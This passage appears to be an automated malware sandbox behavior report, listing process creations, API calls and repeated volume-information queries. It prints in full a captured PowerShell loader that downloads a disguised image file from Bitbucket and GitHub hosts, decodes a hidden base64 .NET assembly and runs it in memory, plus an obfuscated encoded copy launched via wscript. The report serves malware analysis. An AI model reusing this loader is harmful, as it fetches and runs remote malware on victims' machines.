#i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#c
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.smniifi/niam/sdaeh/sfer/ann/akiseawueji/moc.tnetnocresubuhtig.war//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#ge#z#bz#hm#zwbm#gq#cwbn#c8#d#bl#hm#d#bp#g4#zw#v#gq#bwb3#g4#b#bv#ge#z#bz#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#n#cw#i##n#gg#d#b0#h##cw#6#c8#lwby#ge#dw#u#gc#aqb0#gg#dqbi#hu#cwbl#hi#ywbv#g4#d#bl#g4#d##u#gm#bwbt#c8#cwbh#g4#d#bv#g0#yqbs#g8#lwbh#hu#z#bp#hq#lwbt#ge#aqbu#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#cJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.smniifi/niam/sdaeh/sfer/ann/akiseawueji/moc.tnetnocresubuhtig.war//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042C3C6 cpuid 13_2_0042C3C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_00444161
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_004441AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_00444247
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_004442D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_0043D32C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_00444524
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_0044464D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_00444754
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,13_2_0040A7D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00444821
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_0043CEC5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,13_2_00443EE9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
